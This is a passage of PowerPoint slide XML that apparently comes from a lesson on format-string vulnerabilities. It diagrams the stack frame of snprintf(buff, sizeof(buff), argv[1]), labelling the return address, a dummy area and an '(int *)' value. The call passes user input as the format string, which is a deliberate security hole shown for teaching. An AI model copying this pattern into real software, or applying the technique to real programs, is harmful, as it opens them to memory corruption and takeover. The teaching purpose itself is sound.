        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10031830" y="1367729"/>
            <a:ext cx="1225898" cy="954190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="직사각형 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10030068" y="1144030"/>
            <a:ext cx="1224136" cy="215476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>return address</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="오른쪽 중괄호 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11193464" y="1003014"/>
            <a:ext cx="327151" cy="131890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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11469092" y="1246967"/>
            <a:ext cx="1099133" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>frame </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="직사각형 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144344" y="823170"/>
            <a:ext cx="652342" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="직사각형 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144345" y="1147562"/>
            <a:ext cx="652341" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="직사각형 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144344" y="2062062"/>
            <a:ext cx="652341" cy="2708434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[1]</a:t>
            </a:r>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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="직사각형 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2879707"/>
            <a:ext cx="288032" cy="128604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="2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6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3999817" y="5897575"/>
            <a:ext cx="216024" cy="196644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="2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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11461346" y="2183419"/>
            <a:ext cx="1099133" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>Dummy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>area</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="오른쪽 중괄호 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11345864" y="2321919"/>
            <a:ext cx="174751" cy="152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02BEFDC6-CEA9-454D-802A-109324BA8111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8789931" y="726015"/>
            <a:ext cx="1080120" cy="960831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(buff), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="포인트가 5개인 별 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9250787" y="1402587"/>
            <a:ext cx="180528" cy="140166"/>
          </a:xfrm>
          <a:prstGeom prst="star5">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="EF6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포인트가 5개인 별 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10602502" y="2308030"/>
            <a:ext cx="180528" cy="1401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p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8544272" y="2183419"/>
            <a:ext cx="1485796" cy="62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왼쪽 중괄호 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8530543" y="2321919"/>
            <a:ext cx="270266" cy="214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2" name="직선 화살표 연결선 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8800809" y="3396476"/>
            <a:ext cx="1055836" cy="175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구부러진 연결선 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9250787" y="2398118"/>
            <a:ext cx="1180204" cy="998357"/>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왼쪽 중괄호 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9856645" y="2918607"/>
            <a:ext cx="135133" cy="13062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6" name="구부러진 연결선 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8355794" y="3409274"/>
            <a:ext cx="2342678" cy="1134398"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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7752185" y="1844824"/>
            <a:ext cx="720080" cy="21723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7768812" y="4529112"/>
            <a:ext cx="720080" cy="21723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4" name="직선 화살표 연결선 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59" idx="1"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768812" y="4637731"/>
            <a:ext cx="1684206" cy="80517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6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="2584247"/>
            <a:ext cx="1569282" cy="196644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="2706943"/>
            <a:ext cx="2321764" cy="172764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080950" y="5315448"/>
            <a:ext cx="1414649" cy="114897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3128729" y="3876506"/>
            <a:ext cx="812905" cy="125846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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6028DA10-CE40-4294-8561-BC7F9D3B0CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3941634" y="3850627"/>
            <a:ext cx="842320" cy="189454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9BED7">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포인트가 5개인 별 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="5572098"/>
            <a:ext cx="180528" cy="1401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포인트가 5개인 별 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9070259" y="3290173"/>
            <a:ext cx="180528" cy="1401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포인트가 5개인 별 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207568" y="4814030"/>
            <a:ext cx="180528" cy="1401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포인트가 5개인 별 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272530" y="5433440"/>
            <a:ext cx="180528" cy="154183"/>
          </a:xfrm>
          <a:prstGeom prst="star5">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="EF6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8829332" y="4873361"/>
            <a:ext cx="588623" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="직사각형 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11554143" y="5457613"/>
            <a:ext cx="374505" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF66">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>76</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="왼쪽 화살표 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10813273" y="5493279"/>
            <a:ext cx="707341" cy="177486"/>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392353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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43"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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48"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txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53"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10">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txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58"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10">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0">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="10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10">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0">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">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10">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xEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">
                                            <p:txEl>
